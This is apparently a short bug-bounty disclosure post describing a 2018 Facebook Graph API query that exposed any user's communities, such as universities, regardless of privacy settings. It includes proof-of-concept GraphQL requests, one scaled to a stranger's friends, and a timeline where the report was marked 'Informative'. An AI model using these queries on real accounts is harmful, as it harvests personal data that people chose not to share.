~1 min

Reveal Communities for Anyone on Facebook

It’s possible to find out the communities for any user on Facebook.

Impact

One can use this information to associate the universities anyone attended, regardless of the “School” section of their profiles and its privacy settings, as long as they have signed into such communities.

This is potentially a privacy risk.

Proof-of-Concept

Server Request

HTTP POST /v2.12/graphql
Host: graph.facebook.com
q=node(USER_ID){communities}

Server Response

{
  "100000000000000": {
    "communities": {
      "nodes": [{
        "name": "Some University",
        "url": "https://www.facebook.com/groups/<some university>/",
        "id": "3000000000000000"
      }]
    }
  }
}

To make it worse, it can be scaled into querying a complete stranger’s friends’ communities:

Server Request

HTTP POST /v2.12/graphql
Host: graph.facebook.com
q=node(USER_ID){friends{nodes{communities}}}

Timeline

2018-03-09: Report Submitted

2018-03-10: Report Marked as “Informative”, due to:

The behavior described in this report appears to be working as designed.